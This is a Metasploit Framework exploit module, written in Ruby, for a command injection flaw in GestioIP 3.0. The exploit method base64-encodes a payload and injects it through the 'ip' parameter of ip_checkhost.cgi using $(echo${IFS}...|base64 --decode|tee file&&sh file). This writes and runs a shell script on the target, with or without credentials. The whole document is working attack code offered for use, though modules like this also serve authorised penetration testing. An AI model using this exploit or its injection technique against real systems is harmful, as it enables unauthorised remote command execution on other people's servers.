## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'GestioIP Remote Command Execution', 'Description' => %q{ This module exploits a command injection flaw to create a shell script on the filesystem and execute it. If GestioIP is configured to use no authentication, no password is required to exploit the vulnerability. Otherwise, an authenticated user is required to exploit. }, 'License' => MSF_LICENSE, 'Author' => [ 'bperry' #Initial Discovery and metasploit module ], 'References' => [ [ 'URL', 'http://sourceforge.net/p/gestioip/gestioip/ci/ac67be9fce5ee4c0438d27dfa5c1dcbca08c457c/' ], # Patch [ 'URL', 'https://github.com/rapid7/metasploit-framework/pull/2461' ], # First disclosure [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2013/10/03/gestioip-authenticated-remote-command-execution-module' ] ], 'Payload' => { 'Space' => 475, # not a lot of room 'DisableNops' => true, 'BadChars' => "#", }, 'Platform' => [ 'unix', 'win', 'linux' ], 'Arch' => ARCH_CMD, 'Targets' => [[ 'Automatic GestioIP 3.0', { }]], 'Privileged' => false, 'DisclosureDate' => 'Oct 4 2013', 'DefaultTarget' => 0)) register_options( [ OptString.new('URI', [true, 'URI', '/gestioip/']), OptString.new('USERNAME', [false, 'The username to auth as', 'gipadmin']), OptString.new('PASSWORD', [false, 'The password to auth with', nil]) ], self.class) end def uri datastore['URI'] end def user datastore['USERNAME'] end def pass datastore['PASSWORD'] end def use_auth !(pass.nil? or pass.empty?) end def exploit headers = {} if use_auth headers['Authorization'] = "Basic " + Rex::Text.encode_base64("#{user}:#{pass}") end pay = Rex::Text.encode_base64(payload.encoded) file = Rex::Text.rand_text_alpha(8); send_request_cgi({ 'uri' => uri+"ip_checkhost.cgi?ip=2607:f0d0:$(echo${IFS}" + pay + "|base64${IFS}--decode|tee${IFS}"+file+"&&sh${IFS}"+file+"):0000:0000:0000:0000:0004&hostname=fsd&client_id=1&ip_version=", 'headers' => headers }) end end